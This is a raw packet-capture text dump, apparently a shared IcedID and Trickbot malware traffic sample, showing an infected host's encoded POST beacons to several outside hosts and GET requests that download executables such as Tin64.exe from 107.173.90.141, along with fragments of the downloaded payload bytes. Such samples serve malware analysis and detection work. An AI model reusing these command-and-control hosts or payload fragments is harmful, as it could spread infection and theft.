2019-07-29 13:00:59.135089 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [P.], seq 1:771, ack 1, win 64240, length 770: HTTP: POST / HTTP/1.1
E..*.?@…].
..eh..V.b.P…&D;”.P…….POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.spanesi.com
Cache-Control: no-cache

Ax7m7VKupQADayozBXlPTlW3Rb+iyGxupqnfz1KXuEtJqsumvHWGTXgJ3la7IYWyy0wrfcd5tq0Nv67QGRfa37je7asRoaeUZBk3+iNqzlDQfA5IlmanUWhBkpt6ZvKUdmZZ09qLi6STnTf1e8iYiZFDHV044pCuy5LeLxK83OAITgApwVagHdhrfPJ0aVaMwjbgjaLz/50Y1fI2IXTVCi3T1cJt3/qeUYHullfNxq/RhDqhf0+7FujpJC/mzBY9wTmslIDYVlPBBkxidBjvOXZbqxwXVr+tpsacYBRwCAUzqodwinxWAE+dL0w39CJzQkeDpIsP7Ie+uXE82zpN4CVrDcdENT1FKfEoSEgyIhif8lf4AEWirBJ8H7KfdQFT+rWN11eEqNzZcI0neS/w6AhPyUsXP8M7DI2Zhm3/1gkVs6MteuCbYZ6nXSHMa1T1txVasJ8QIuIXOBeHEj+6bmVcFiZbiFuVztE6eZJsE6lehw52lhdoJ5y+6s0lkNiWzYvmi/zEedIjhAJc02zaoQ==
2019-07-29 13:00:59.135140 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [.], ack 771, win 64240, length 0
E..(.y…..zh..V
..e.P.bD;”….(P…v~..
2019-07-29 13:00:59.153346 IP 172.16.5.2.53 > 10.7.29.101.65154: 28480 2/2/4 CNAME 2print.com., A 184.168.221.53 (202)
E….z……….
..e.5….~.o@………..www.2print.com…………………………….5………….ns27.domaincontrol……………ns28.O.J……….aJg..J……….&…!q………..k…………G..k……….&…”q……….
2019-07-29 13:00:59.153873 IP 10.7.29.101.49254 > 184.168.221.53.80: Flags [S], seq 1193526277, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.@@…5:
..e…5.f.PG#…….. ……………..
2019-07-29 13:00:59.155302 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [S.], seq 355223488, ack 4209286922, win 64240, options [mss 1460], length 0
E..,.{……h.I.
..e.P.c.,G….
`….B……
2019-07-29 13:00:59.155392 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [.], ack 1, win 64240, length 0
E..(.A@….;
..eh.I..c.P…
.,G.P…#…
2019-07-29 13:00:59.155532 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [P.], seq 1:773, ack 1, win 64240, length 772: HTTP: POST / HTTP/1.1
E..,.B@….6
..eh.I..c.P…
.,G.P…Nn..POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 540
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.rs-ag.com
Cache-Control: no-cache

XXTc5yB8pQDhZhbvcwBrU1OYKjSIHRfuVCXVJsqxREL8MU9UVfvk6NEGuk8mLn6d9of2goBzO4ncAiRL0nhgYuUZIkCk/czwzlMog/4/3ohpHmcPJ7e2pFZfvWGSSgdnBNt/1Wk2SJ2JiG4yx4XMfJ9wvPi9Ka8XgZYU43vQIqgC+k8tEmMcmqYPXVOe7LApGAcTprzV80reoZUgsQcC7XVKzYwYBqiyFZdClmwgpge3ALD2XNTtaHw75PuO1i2pgc3zcV0WOt0ulFzN6IexXdr62goFpRuT2aQdjNI9ZUYpWxLs0uWgjFhM1Os7djM7Pjtn0rX2jKQHFnr9i3565oL0jsqhNqphYFWeMsY+VwYxJJBe08X0CnEPO6N5x3eyqTzKSWDM7+un3diIY20b7H6iBnMRF5xV9YZBtLNHP5p+03UFutC3RqBlQVwuvdphGuymo8uHmHdhvwOYyR2sU1AABoZHo66XaXj8JflxcbSWTmzbuOS+ZySWEEei2bAPsaUlWRndr9aVx35jZOsH8psKMw==
2019-07-29 13:00:59.155592 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [.], ack 773, win 64240, length 0
E..(.|……h.I.
..e.P.c.,G…..P… …
2019-07-29 13:00:59.171901 IP 104.25.152.27.80 > 10.7.29.101.49252: Flags [S.], seq 924723558, ack 2628897603, win 64240, options [mss 1460], length 0
E..,.}….b.h…
..e.P.d7.)f…C`….V……
2019-07-29 13:00:59.172132 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [.], ack 1, win 64240, length 0
E..(.C@…..
..eh….d.P…C7.)gP…….
2019-07-29 13:00:59.172470 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [P.], seq 1:768, ack 1, win 64240, length 767: HTTP: POST / HTTP/1.1
E..’.D@…..
..eh….d.P…C7.)gP….u..POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.c9dd.com
Cache-Control: no-cache

biRN0zTRpADIHVQlj0s8Xof2rF4sqrrVqBmtdiNN5r1aTGBCayDDw/GsDOn3drrVedvEeN/rz1NDDypzGUjdXX87PABis7mAdVShJmNAFzWiqtIbOTiF0mAlofT86Dj3ZA+lPMiQGBMzW1P6aRP5qR+btt2+T8j0dqUdUb+aJnjlneEERgnq595Ot8a/17XcGtdlcA+Yz2MbGK4RzYaWtdZGvTfM9zEkCRIiSCYvyVlYyV2Jqd7ehNDm0f9iIynTF3vZ9d1JTCLd9EuORzj4s5RjPWn7We1XfGVlafFt7upU1qtbVkc7OyEMavyhra8fa0PPevqlrT1x/tcYPbFEuJ5a6cLsjN7WH+3EGMRCW9xThRDB1XsDYmuC7WFYZtbUthL/S7Em+rhFbBkXxXToRhyhzCDz9WVI2qroJGIBkbCAsY44QfNUH5j0VoXufYlUSjL5A37rGZtJtJ87e3Wlr/2GEd5mGUv9P5+lEnbE9ZJEE/+SpZPFMgjqo2+y6LZQnyPwwLkG17ZxSd7ZYqcrUNg/

2019-07-29 13:00:59.687314 IP 10.7.29.101.52012 > 172.16.5.2.53: 33479+ A? www.vazir.se. (30)
E..:.o….Y.
..e…..,.5.&%3………….www.vazir.se…..
2019-07-29 13:00:59.699312 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [S.], seq 687621463, ack 3876635042, win 64240, options [mss 1460], length 0
E..,……h.:@..
..e.P.k(.EW….`….”……
2019-07-29 13:00:59.699454 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [.], ack 1, win 64240, length 0
E..(.p@…..
..e:@…k.P….(.EXP…….
2019-07-29 13:00:59.699544 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [P.], seq 1:756, ack 1, win 64240, length 755: HTTP: POST / HTTP/1.1
E….q@….+
..e:@…k.P….(.EXP…….POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.vitaindu.com
Cache-Control: no-cache

8IlD6Hp/pQBUVUU1HQiLqL0qEQfqhORoTjln6RJOQ15jryfneNJiY86EOVLCoqU8bm0OsgXpA0255OV/bAT01clkJeyVjje3bxnPyOvfUsPdp3RPMckUExFs8ujM0HXhFPAwBD3zV8qMRTWUMmJ6279Vl4oR4y8nMYNUzUT6wR28tmL6c8XsaVi4OBQu2Nq/IKf6OeD7IWIFGjE0V7Z38R/syLDaPfmBm0j04GoUIPqmB01zH2k/Br0302lD9sG/tg3odcCXvrktL/YlCBy4NfihYgr8CxaZa4HPM1oVPyusFQHhfw9DDZ/X7aFC+nL8KeKhCK3RtjW4/4McUWA/fw3thufPiTO+fU6adClg6cz69ImGjn9e7M5+A+gcNHnLWNCqkDLoGPRFzTRjKk6Q9hbQQeX/ZidGdK0i+u1ldp2Btm89r0Ct0WSdAigO04vXdHZzaLphNqT/N7liOfi1IT4tX4U+0diO4uC+X699Z6Qf+DftG+NLC4Je+8Wpm+/6+HnqxHQ=
2019-07-29 13:00:59.699603 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [.], ack 756, win 64240, length 0
E..(……h.:@..
..e.P.k(.EX….P…….
2019-07-29 13:00:59.782318 IP 172.16.5.2.53 > 10.7.29.101.58389: 12756 1/2/2 A 210.140.73.39 (142)
E……………
..e.5….O.1…………www.ex-olive.com……………….I’………….ns01.telewave.ad.jp…………..ns01.epressd.O._…………JR.>………..z.2
2019-07-29 13:00:59.783153 IP 10.7.29.101.49262 > 210.140.73.39.80: Flags [S], seq 3843601751, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.r@….2
..e..I’.n.P…W…… ……………..
2019-07-29 13:00:59.819475 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 13821:15203, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)…..NSP…….2.528c.494-.542.973-1.114 1.5-1.716.449-.544.869-1.111 1.257-1.7l.15-.226c.329-.481.659-.983.988-1.505.329-.522.599-.963.808-1.324l.4-.692c1.607-2.889 2.963-5.91 4.055-9.03 2.459-7.089 3.861-14.502 4.16-22 0-.773.03-1.556.09-2.348 7.811 2.273 17.1 5.433 20.726 8.157 2.257 2 4.155 19.52 5.427 42.428h3.666c-1.332-21.91-3.381-42.477-7.013-45.182-4.658-3.512-16.387-7.25-24.858-9.593l-8.558-4.257c-.674-.339-1.488-.219-2.035.3l-5.791 5.523-4.25 4.034-4.19-4.079-5.731-5.569c-.54-.53-1.355-.662-2.035-.331l-8.784 4.289c-8.47 2.273-20.022 5.87-24.646 9.286-3.685 2.715-5.645 23.414-6.68 45.574h3.652zm57.856-53.069l.628-.783.284-.271 1.18-1.128.254.12 3.906 1.957 2.918 1.5v.135l-4.744 12.04-8.694-5.794-2.32-1.5 6.588-6.276zm-28.013 1.159l2.993-1.5 3.846-1.881.21-.06.09.075 1.407 1.37h.075l.569.557 6.51 6.366-2.245 1.5-8.829 5.779-4.621-12.04-.005-.166zm2.14 15.577c.194.505.606.894 1.12 1.061.514.167 1.076.092 1.529-.203l10.475-6.893 3.292-2.152 3.307 2.243 10.475 6.923c.45.303 1.013.386 1.53.225.518-.161.935-.548 1.134-1.053l1.766-4.515c-.686 4.963-1.905 9.837-3.636 14.539-.932 2.49-2.053 4.905-3.352 7.224l-.389.662-.7 1.174c-.359.572-.718 1.1-1.062 1.61l-.21.3c-.344.5-.7.963-1.047 1.4l-.434.527c-.344.406-.673.8-1.018 1.159-.689.743-1.429 1.436-2.215 2.075h-8.863c-.765-.637-1.485-1.326-2.155-2.062-.359-.391-.7-.8-1.062-1.249l-.374-.452c-.359-.467-.733-.963-1.092-1.505l-.1
2019-07-29 13:00:59.819587 IP 10.7.29.101.49255 > 157.7.107.91.80: Flags [.], ack 15203, win 62858, length 0
E..(.s@…..
..e..k[.g.P..NS)..%P….B..
2019-07-29 13:00:59.820412 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 15203:16585, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)..%..NSP…….5-.226c-.374-.542-.733-1.1-1.107-1.7l-.434-.722c-.209-.346-.418-.707-.629-1.084-1.273-2.322-2.369-4.737-3.277-7.224-1.852-5.166-3.093-10.53-3.7-15.984l2.278 5.902zm49.653 36.333l.1-25.993c.016-.483-.162-.953-.494-1.305-.331-.351-.79-.553-1.272-.561-.239-.011-.478.03-.7.12-.678.284-1.115.951-1.107 1.686v26.053h3.473zm-36.288-26.189c.328 1.337 1.526 2.277 2.903 2.277s2.575-.94 2.903-2.277c.157-.858-.076-1.741-.636-2.409-.558-.666-1.384-1.047-2.253-1.038l.075.015c-.885-.038-1.74.328-2.322.996-.582.668-.829 1.564-.67 2.436zm2.946 6.2v.015c-.968-.014-1.88.452-2.437 1.244-.556.792-.685 1.808-.343 2.714.456 1.128 1.552 1.867 2.769 1.867s2.313-.739 2.769-1.867c.058-.152.103-.308.13:

IcedID Iced ID and Trickbot Banking Malware Trojan Downloader Dropper PCAP file download traffic sample

2019-08-12 14:04:16.655885 IP 10.8.12.101.49224 > 179.60.144.143.443: Flags [P.], seq 1:119, ack 1, win 64240, length 118
E…. @…..
..e.<…H…4E…D.P…E…….q…m..]Q. k…,..V…kl…k…..$….!…./.5… ….. . .2.8…….,…………..wrotection.pro. ………….. 2019-08-12 14:04:16.655968 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [.], ack 119, win 64240, length 0
E..(. …..v.<.. ..e…H..D..4FWP….2.. 2019-08-12 14:04:16.841099 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [P.], seq 1:810, ack 119, win 64240, length 809
E..Q.!…..L.<..
..e…H..D..4FWP………..Q…M……W……g…:…p…../.*…Z …m….s.G.Z..sN6~.._.d..V=.._a./…………………..0…0.. …… ..d…..&0.. *.H……..0s1.0 ..U….US1.0 ..U….NJ1.0…U.
..belles fogginess’s1.0…U….introversion’s cashier1.0…U….indecisively.org0…190630040001Z..200629040001Z0s1.0 ..U….US1.0 ..U….NJ1.0…U.
..belles fogginess’s1.0…U….introversion’s cashier1.0…U….indecisively.org0..0.. .H…………0……..Q…X.)t5X…..5..}}..7..5……..[……#…5.....H...$..|Z4.....QB}S.......u.pJh.../6h.......IC....o.H.3.{............/b........S0Q0...U......|{..q..nb......f.AP.0...U.#..0...|{..q..nb......f.AP.0...U.......0....0.. *.H.............3.A....7Z;.E.V....A..m..B.d..H......j..N[.P?..aQ....N...k..D..............v4.fk.L. kwr.:.U..[@.j...{~f..+Hg.........."n…………….

2019-08-12 14:04:22.653444 IP 10.8.12.101.49226 > 107.173.90.141.80: Flags [P.], seq 1:79, ack 1, win 64240, length 78: HTTP: GET /SWKLPFVBDS.exe HTTP/1.1
E..v.:@…..
..ek.Z..J.P…/e..&P….i..GET /SWKLPFVBDS.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.653480 IP 107.173.90.141.80 > 10.8.12.101.49226: Flags [.], ack 79, win 64240, length 0
E..(.V….^.k.Z.
..e.P.Je..&…}P…….
2019-08-12 14:04:22.653825 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [S.], seq 1652259580, ack 1389350972, win 64240, options [mss 1460], length 0
E..,.W….^.k.Z.
..e.P.Kb{z.R..<`….^…… 2019-08-12 14:04:22.653923 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.;@…..
..ek.Z..K.PR.. 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin64.exe HTTP/1.1
E..q.<@…..
..ek.Z..K.PR..<b{z.P…=!..GET /Tin64.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.654025 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [.], ack 74, win 64240, length 0
E..(.X….^.k.Z.
..e.P.Kb{z.R…P…….
2019-08-12 14:04:22.658025 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [S.], seq 848954188, ack 3386416125, win 64240, options [mss 1460], length 0
E..,.Y….^.k.Z.
..e.P.L2..L….`…d%……
2019-08-12 14:04:22.658306 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.=@…..
..ek.Z..L.P….2..MP…{…
2019-08-12 14:04:22.658387 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [P.], seq 1:72, ack 1, win 64240, length 71: HTTP: GET /tin.exe HTTP/1.1
E..o.>@…..
..ek.Z..L.P….2..MP…….GET /tin.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.658419 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [.], ack 72, win 64240, length 0
E..(.Z….^.k.Z.
..e.P.L2..M…DP…{…
2019-08-12 14:04:22.658818 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [S.], seq 2043162382, ack 4219249562, win 64240, options [mss 1460], length 0
E..,.[….^.k.Z.
..e.P.My./..|..`………..
2019-08-12 14:04:22.658925 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.?@…..
..ek.Z..M.P.|..y./.P…….
2019-08-12 14:04:22.659036 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin86.exe HTTP/1.1
E..q.@@…..
..ek.Z..M.P.|..y./.P…….GET /Tin86.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.783970 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 21901:23361, ack 74, win 64240, length 1460: HTTP
E………X.k.Z.
..e.P.My….|..P….-…………………@……. ……………CWindowDock Demo – Child 2..CWindowDock Demo – Child 1..CWindowDock Demo – Parent…Fa7b$~m?aEdng?hWoWA$Q0?1#7~fcD9h5k.1M@ijUEYlfckR2…..E+rb48gCbj9hFjI5j/ZqV2/cscyHMj8xmXmyuXHP9+PNwpxEYTfYSyGizOgAmOWp14BVb1f7S6XAi7rtvKaOuUY5aI+zUCKWvieY9aPXqkdkbt2rw/v33gTw2v/XjSE3ftxh+dcJvG+nza/fzyZ+bYUFwrNj7nrc3KG/3yZRMIVE/W4Y7yaYsqbdpWlGYY2ZLeJetiSh76GPv2pXb+3aHzVHtnSTvLCOEkY5aI9KWIFdvif89aPXA0dkbt3l4y3B3gT02v7XYiE3ftwob0tvvG+Tza/fJiZ+bYUMIAqr7nqg3KG/dCZRMIUtnRlO7yaAsqbdDGlGYY1ZQVJxtK7OlIZ/PWhXBUfK3Nx111sjZ4GxCQC07WXVlLkLNzLbqQXzY0Vk4+K7lKiQPUF0rudVKa5y6gxjFMa/vmdjxaUHpaH6kcCeQmRvZ7QpawVTQuU5MA8xI747pgtAOGg1JdwGdV1irTvVwLcvYOWXVWgBkIDC4F0DwFkgNn5mNRPGu7DqZMIqNmIk8yjXMcjhPpjAlwc4ACkgUTA3ZnRggTOnFG+XYJbuhm6zYiV+bbLkwZiRmG+XIoOoFPDU8DC1yDd+ZjS7bNxl1R6unmKuob5iurlFZG7sYqg9Lz9BFFEwwEJzyA1SnDHRl2D24gOBsqIr+to/YUXvG4NolyQ7qDQsAc9K2dzh+6ZswKZoNSpYhgcMISINQLISaWcb37RuVCpfKySuRsNhqHGGZSakaZdAwpQThTjVZ3jgSUkCX5Yb4+Mii9oEiGLPb1s7ujvyMxPGHd3VPvbk9xd3KQc77ACEPux68NSvXxHbJNjA56b3ClroBxFrcMriw1XKndvz6Ludups+mEqEqDqPxOQlL8BEz8grtugZwe31Xn65FN+d94EY056W7xubaJeBhFHKeam7Ss2gSpZmF0hul0DClBOpyBfMgb68HKlkGmLAHbuQhBbbh29haqjSI6RrRF3JBSprRup3bq8+ebRhzmTlJy+rM85nQSRRu389qHdq7WPPeXj2GbmtcfaoKUIMMN+FGG3k10hUvxbLJdXwStuo9b0z6Ki6hCV5PRHqzutxgl7J6gJY5SMHEFSo3BEE2mgjMvS8NkJgm7IoLSmkzzTD62mO5HqZwKQaf7Rk5WyYqYWuz8AKZssKdOgRzS4OX5M0iQSieyA2tIQYp+Uiz2fgayfKINIz+NrI……..E+rb48hWbz9hxhliZ0Fu1BJbUVpWA//YqTp+Zu4BsTi4Z+8XibBvJH7u+2mDIeJn+e03k
2019-08-12 14:04:22.783982 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 23361:24821, ack 74, win 64240, length 1460: HTTP
E………X.k.Z.
..e.P.My..O.|..P….z..Ki+UZe1Xs7cyA2g5ibGl8pPrcMCyJ3bDKu6BbqbkVT57TKQqL4Wl7VZztzIfqDmLMaXymetwwjIndsbq7oLupuRFPntPJCovleXtVPO3MgfoOYpxpfKTa3DD8id2xurug66m5El+e0nkKi+S5e1Ts7cyAag5jbGl8prrcMSyJ3bfqu6gbibkQb57baSqL5Al7XdzNzICKDmp8SXykutw4XKndsOq7qEuJuRDvntsZKovheXtdjM3MhMoOasxJfKBK3DiMqd2xqruou4m5EL+e28kqi+SJe108zcyH6g5rTEl8pprcOQyp3bDKu6k7ibkR757aSSqL5Ul7XLzNzICqDmscSXymutw5fKndsdq7qWuJuRFvntr5KovlGXtcbM3MgXoOa+xJfKWK3Dmsqd2xurup24m5Ek+e2qkqi+S5e1wczcyBCg5rvEl8percNhyZ3bG6u6YLubkR/57VWRqL5Ql7U8z9zIP6DmQMeXyiqtwxXInds9q7oUupuRFfntIZCovl2XtUjO3MgOoOY8xpfKXq3DGMid2zeruhu6m5EK+e0skKi+VJe1Q87cyBGg5jnGl8pYrcMfyJ3bCqu6HrqbkSz5LdcKkQSlKPZ6syPx+yqcu8Yr868muZ7IEOL7I8Ceuh2o4nCXqJAnh6EBz8DOV/H7N5y7xi3zrzm5nsgM4vs+wJ66B6jia5eokCWHoQTPwM5a8fswnLvGGPOvPLmeyBbi+zXAnrpk4/LflaiQBb5x1bl6pa6yjpucu2njeL46uTS/62Hi4KoVupuRNbQtwz+oFKzYdZ+8rnuBmZwVsj2heJQT6b4ngLjoL5+6m2mhunmpkKhD4tQiwc7cN7jjcLrGlzXs7lKfyJ0kuOgqn7qbyqG6fqmQqEHi1CfBztw3uON7usaXZ+zuX5/InXe46CWfupsvobpzqZCoc+LULMHO3De44366xpc37O5Yn8idJLjoIJ+6m26hukipkKhA4tQRwc7cN7jjQbrGlzXs7mWfyJ0kuOgbn7qbxaG6TamQqK7i1BbBztzNuONEusaX8+zubp/InVm46BafupuGobpCqZCon+LUG8HO3My440+6xpdd7O5rn8idHLjoEZ+6m2ehukepkKjT4tQAwc7c7rjjUrrGl3fs7nSfyJ1auOgMn7qbBaG6XKmQqMji1AXBztypuONVusaXFOzucZ/InfO46Aefups8obpRqZCoXeLUCsHO3K6441i6xpcJ7O56n8idM7joAp+6myahulapkKgP4tQPwc7cDbjjI7rGl3Hs7gefyJ0muOh9n7qbnKG6K6mQqLvi1HTBztxDuOMmusaXYuzuAJ/Inf646HifupuKobogqZCokuLUecHO3Pe44ym6xpcA7O4Nn8idQ7joc5+6m5ShuiWpkKgv4tR+wc7c6LjjLLrGl03s7hafyJ1ouOhun7qbG6G6OqmQqHTi1GPBztwru
2019-08-12 14:04:22.783983 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 32121, win 64240, length 0
E..(.^@…..
..ek.Z..K.PR…b{.uP….Z..
2019-08-12 14:04:22.783993 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [P.], seq 24821:26281, ack 74, win 64240, length 1460: HTTP
E………X.k.Z.
..e.P.My….|..P…F…OM3usaXlezuE5/InVC46Gmfupsnobo/qZCoouLUaMHO3Be44zq6xpcm7O4cn8idVbjoZJ+6m1uhujSpkKgk4tRtwc7c6LjjPbrGlyfs7hmfyJ0EuOhfn7qbm6G6CamQqLTi1FLBztzCuOMAusaX9OzuIp/Incm46FqfupsyoboOqZCo0OLUV8HO3AG44wu6xpdA7O4vn8idlLjoVZ+6m8ehugOpkKjd4tRcwc7cM7jjDrrGl+7s7iifyJ0ouOhQn7qb4qG6GKmQqP7i1EHBztyuuOMRusaXQOzuNZ/InTe46EufupsQobodqZCoxuLURsHO3Le44xS6xpd+7O4+n8idVbjoRp+6m/qhuhKpkKj54tRLwc7cN7jjH7rGl5Xs7jufyJ1ZuOhBn7qb2aG6F6mQqBLi1LDBztzquOPiusaXFezuxJ/InUe46LyfupuAobrsqZCotuLUtcHO3LS44+W6xpd07O7Bn8id2rjot5+6m3ihuuGpkKjm4tS6wc7cWbjj6LrGl+rs7sqfyJ0FuOiyn7qbE6G65qmQqDfi1L/Bztz3uOPzusaXsOzu15/InfG46K2fupsLobr7qZCoPuLUpMHO3De44/a6xpcW7O7Qn8idc7joqJ+6myuhuvCpkKgT4tSpwc7cNbjj+brGl6js7t2fyJ3OuOijn7qbB6G69amQqO3i1K7BztwouOP8usaXyOzu5p/InRu46J6fupviobrKqZCoC+LUk8HO3Oe448e6xpc07O7jn8idJLjomZ+6m26hus+pkKhB4tSYwc7cN7jjyrrGlzXs7uyfyJ0kuOiUn7qbbqG6xKmQqEHi1J3Bztw3uOPNusaXNezu6Z/InSS46I+fuptuobrZqZCoQeLUgsHO3De449C6xpc17O7yn8idJLjoip+6m26hut6pkKhB4tSHwc7cN7jj27rGlzXs7v+fyJ0kuOiFn7qbbqG606mQqEHi1IzBztw3uOPeusaXNezu+J/InSS46ICfuptuobqoqZCoQeLU8cHO3De446G6xpc17O6Fn8idJLjo+5+6m2+huq2pkKhB4tT2wc7cN7jjpLrGlzXs7o6fyJ0kuOj2n7qbbqG6oqmQqEHi1PvBztw3uOOvusaXNezui5/InSS46PGfuptuobqnqZCoQeLU4MHO3De447K6xpc17O6Un8idJLjo7J+6m26hurypkKhB4tTlwc7cN7jjtbrGlzXs7pGfyJ0kuOjnn7qbbqG6samQqEHi1OrBztw3uOO4usaXNezump/InSS46OKfuptuobq2qZCoQeLU78HO3De444O6xpc17O6nn8idJLjo3Z+6m26huoupkKhB4tTUwc7cU7jjhrrGl+Ds7qCfyJ2OuOjYn7qb36G6gKmQqOfi1NnBztw0uOOJusaXLezurZ/Inba46NOfupttobqFqZCo6+LU3sHO3Aa444y6xpcb7O62n

2019-08-12 14:14:56.835089 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 4809:6269, ack 1931, win 65535, length 1460
E…:.@…..
…........)a..t..P...F……”….[…>.:.8. .E8..[ 3…..K… 6......H..M...+.......K.>.5b.......QE...p.....aR.......q….4….R…….c.%.v.”….}…..M…6…beD.a1d……. …R………..De…MY…X.KO..TN.F...>.Ns.x..s..w..e.m..e.m. .z......{..[.4.b.).@J...?-.;} .,.6...8.m..e0.yZ.[..I{.4..?4.n,..#Sk...lv....CX.wB.,H........ ..H9ib......|bO@...._U..:.{DL-Yd..r...n<.?...$....?.....=..'.pvqD.{ .~j..0J...?q.KM..C..+C....o.}..V...O...Hc.........1....'$>....P..z...b.P..... n1.%...D.......1...c..6..."]. .J:.n.[O-.A......N...(.VD.6....vLXt..r...1.J.F1.B.u.....^......(....H.....l.=af.].c...C.9C.r.......P.1..X5.r......BB.2..?h..#..._.qZ....ou.^p.a^g...V....[9......k\[wl.!i6..7...{.A<.n.'..j...BQ..g....v..!..:A....GT.4.....W.jI .V._cM9._..\ .Ka..y..sN.*..flF..D.. \.=..,.8[oG...{gVL.... 6y.Z....N...6X..........a....#..(.......Q.s...\S..c5.._cM.^.....[..\.V..o….x.Mv.6,.r.+…….O..R…B..2&&.K%….:A..n.E .BI.H.8L..e..’….T.Z.y 2w/F..d.;.0L…?……5…).K..g)..v!.B..:?f…….L..[…;..@…)….F…N…Y.”.6>..ai@….[.,.g..&… }..$…………....i..0.8./.Zid |m[....[n........|..ay/|.:.Z~.A...Y...........!)..Y*Mo.])...N........Hs.......c..v......H2.&e....#9..6_.......4x...O I.t.:...I..b......j..8.Cxk.m.C.u...s.K......$..w..k5...._....{T....98...R...I.....4.w.).0@.......cl.Ph,.+u..>~W ..x.;3..q|e.8...qW?..d4..?..i.dw...F..W.~.K......bG......~.f.....G.R.:L.#...r.-.........lG......U.)..B......st.iE....S7.+...0~...2Z..I.W.u{.............8\.o..S7...}D.C.f[ 2019-08-12 14:14:56.835150 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6269, win 64240, length 0 E..(;......b... ……..t…)g.P…zQ.. 2019-08-12 14:14:56.835172 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [.], ack 6825, win 65535, length 0 E..(:.@….. ….F(……:ka. 4=P…vC.. 2019-08-12 14:14:56.835251 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 6269:6896, ack 1931, win 65535, length 627 E…:.@….. …........)g..t..P....9...x....4.A.~. ...K...&....f....].......=...s.{.95....4..oE...RH..MM.R...D...\..E.TDYV0.koM.9.. ..N.........8....~.]..}(G..... ...Iyvb....@e.M....Q>eW..=m...$..S.1S^.....62...2D.s}.m..._..<..m......_..].q~..x..,N...aIE.Q.g..MZi.99./.T.c...s...F~U....:..?e...).'2T.]&.#...IL\...gv..,}..i{_....&..fGel.T.]...r.....b.W1.....W..u.....KlS".7>..”.=..!..C..;..r..F..x…)…..?8… …d..i.R..6.}u..a…….u#.w^nw.Z.c%…IOL.-…gJ……bH6).Dh%.v…’F……c.6….&.lZ….A…r..D….H/]C.r.H…../..r~9 C.g..N[l/..9......":.._.G.9r\b....!.......G&............<.. .P....of.;…..:.pB…3.~q<….(.S.:…f..x.7 H./%……p.<…h. 2019-08-12 14:14:56.835276 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6896, win 64240, length 0
E..(;……a... ........t...)j.P...w... 2019-08-12 14:14:57.185963 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [FP.], seq 1931, ack 6896, win 64240, length 0 E..(;......... ........t...)j.P...w... 2019-08-12 14:14:57.186113 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [.], ack 1932, win 65535, length 0 E..(:.@....G .....……)j..t..P…r…
2019-08-12 14:14:57.186214 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [F.], seq 1905, ack 6825, win 65535, length 0
E..(:.@…..
….F(……:ka. 4=P…vB..
2019-08-12 14:14:57.186317 IP 185.70.40.151.443 > 10.8.12.2.60172: Flags [.], ack 1906, win 64239, length 0
E..(;……..F(.
…….. 4=.:kbP…{R..
